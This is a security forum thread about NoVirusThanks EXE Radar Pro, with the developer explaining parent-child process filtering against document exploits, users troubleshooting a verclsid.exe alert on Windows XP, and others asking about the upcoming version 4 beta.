New Antiexecutable: NoVirusThanks EXE Radar Pro

Discussion in 'other anti-malware software' started by sg09, Jun 3, 2011.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @Mister X

    That is a different issue.

    We'll add the option "Set Alert Dialog to Always on Top" to fix that.

    @paulderdash

    Simply whitelisting of all exes is not good of course, that is why we introduced "Vulnerable Processes" and now (with ERP v4.0) Parent->Child control.

    The problem is if you whitelist PowerShell.exe, then a malicious .DOC file can exploit WINWORD.exe to run PowerShell.exe to download and execute a remote payload. Or it can run JavaScript code via Cmd.exe (so no need to drop a payload in the disk). PowerShell.exe and Cmd.exe are commonly used by exploits and should not be whitelisted (instead, they should be filtered). Thanks to Vulnerable Processes + filtering of Parent->Child + filtering of command-line, you can block or be alerted about this behavior.
     
  2. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    Superb explanation in brief. Definitely one of the more important (for me anyway) notes of interest to pen in my defense vs attack (or vice-versa) journal.

    Appreciate it much. Other duties demanding my attention lately but a huge expression of gratitude to those needling out the bugs in these preliminary releases to date. All you guys rock! Special thanks developer andreas for the new work.
     
  3. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    4,639
    Location:
    Under a bushel ...
  4. guest

    guest Guest

    It should stop it.
     
  5. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    I have to disagree with that comment. Not all attacks involve automatic exploits, so white-listing is still a must to protect users against manually installing malware. And a lot of exploits will still eventually run file-based malware, which also should be stopped via white-listing.
     
  6. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    Why would NVT ERP be giving me alerts for verclsid.exe, which is part of Windows XP SP3? Could it be because the file isn't digitally signed?
     
  7. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Depends on your settings, and on where the file is located.
    If it is in windows folder, and you set ERP to auto-allow system files, then it should not alert, even if unsigned (this is assuming that it did not involve a command line containing a vulnerable process). Otherwise, it should alert.
     
  8. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    @schmu26

    Thanks for the quick reply. When the first alert appeared I clicked on the "Block" button. After rebooting I got the alert again and again clicked on the "Block" button. There have been no alerts since then. It's a fresh (new) install of NVT ERP, and I'm guessing that had a lot to do with it.
     
  9. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Maybe you disabled the alert for it?
    Check if it is on the blocked list, and where it is located in the file system.
    If you were on ERP default settings, and this file is in the windows folder, you should not have gotten an alert in the first place.
    I know nothing about Windows XP, so maybe someone else can give you more informed input.
     
  10. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    It happened again when I right-clicked on a file in Windows Explorer. I've attached a screenshot of the alert message.

    Here's what was in the alert pop-up:
    Code:
    Unknown Application Detected
    
    Process Name: verclsid.exe
    
    Process Path: C:\WINDOWS\system32\
    
    Command-Line: /S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401
    
    Parent Process: C:\WINDOWS\Explorer.EXE
    
    File Publisher: Microsoft Corporation
    
    File Description: Verify Class ID
    
    Digital Signature: False
    
    I checked the MD5 and SHA-1 values for verclsid.exe and confirmed that it is part of Windows. I also checked the blacklist inside NVT ERP, and it is empty.

    NVT ERP alert about verclsid.exe process.png
     
  11. guest

    guest Guest

    If it is not malicious and part of Windows, you can add the file to the whitelist. Else you'll see the prompt every time.
     
  12. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    By the way, since you are using ERP, it is obvious that you are serious about PC security. So you should seriously consider moving on to a more secure version of Windows. Don't assume that ERP or other security software is enough to make up for the inherent weaknesses of XP. You are still vulnerable because the XP operating system is not built to protect from modern malware. The Windows kernel is not protected well enough.
     
  13. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    Actually, I do have Windows 8.1 Professional (retail), and I also locked in my free upgrade to Windows 10. However, I don't really like either of them. Using Windows 8.1 often makes me feel annoyed and frustrated, and I don't like feeling that way. Basically, the only reason I use it is to run tax software and other specialized software that requires a supported version of Windows.

    Since I dumped Windows 12 years ago in favor of Linux, I really only use Windows when I have no other choice. That being the case, I will only run Windows in a VM. And, unlike Windows 8.1 and Windows 10, Windows XP runs very well in a VM (on my hardware). Yes, you're right, using Windows XP is less than ideal from a security perspective, but I don't think that's reason enough to totally abandon it. A WinXP VM is useful for running old software, and the security situation can be improved considerably by heavily restricting the main "threat gates". Currently, IE and Firefox are forced to run sandboxed, and only Firefox is allowed to access the internet. But I think I will go ahead and lock down IE, Outlook Express, and WMP, etc., so they won't even be able to run if something tries to launch one of them. BTW, I think "surfing" the web on Windows XP nowadays is unwise; the main reason I have a web browser installed is because some software uses a web browser to access help files and other documentation.
     
    Last edited: Dec 8, 2017
  14. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Yeah, I also use XP in a virtual machine, for legacy software.
     
  15. paulescobar

    paulescobar Registered Member

    Joined:
    Sep 22, 2008
    Posts:
    197
    To all,

    I am an Exe Radar Pro user for many years. I just returned to this topic after many months.
    There's over 200 pages to wade through, so I'd rather just ask here.
    I see a new version of the program has been released. Can anyone catch me up?
    1) Where can I download this new version?
    2) Is it beta & buggy? Or relatively stable?
    3) What Windows OS's are supported?
     
  16. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    So far it's more to alpha then beta, and the beta currently out is a private beta so for now there is nothing to test. It is fairly stable, just it isn't complete and I believe so far it's for all operating systems.
     
  17. hayc59

    hayc59 Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,841
    Location:
    KEEP USA GREAT
    paulescobar Hello :)
    1) Where can I download this new version?
    Download Here: http://www.novirusthanks.org/products/exe-radar-pro/
    2) Is it beta & buggy? Or relatively stable?
    Very Stable BETA
    3) What Windows OS's are supported?
    For Windows XP, Vista, 7, 8, 10 (32\64-bit)
     
  18. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,794
    Location:
    .
    He's looking for the new alpha version...
     
  19. guest

    guest Guest

    this is old beta (v3.xx.), as @Mister X said he talks about v4. ;)

    1- nowhere, until it will be made public in January 2018 (first week if my memory is good)
    2- At the moment it is an alpha version with many features not yet implemented; the core is quite stable, some bugs/issues were discovered and are currently addressed.
    3- at least Win7-8-10, not sure for XP tough.

    @novirusthanks can surely gives you more details.
     
  20. Tarnak

    Tarnak Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    5,285
    I want to give this a try since I have used it on my XP desktop, previously. I will wait until after the kinks have been ironed out in the beta testing of this new version, then will see how it goes Window 10 Pro.
     
  21. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    Good to know, I was getting worried. The current version is already pretty good, but I need more control.
     
  22. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,556
    Is the new ERP 4 compatible with SUA accounts?
     
  23. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,794
    Location:
    .
    Not for the time being. Andreas is working on that.
     
  24. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,556
    Thanks for the reply.
     
  25. guest

    guest Guest

    The next beta-release will be delayed a little bit but i assume it will have a co-signed driver by Microsoft so ERP 4 can be used on a Secure Boot-enabled system.

    (if their application "OS Armor" will get a co-signed driver, other applications from NoVirusThanks will also high probably get one - sooner or later :doubt:)
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.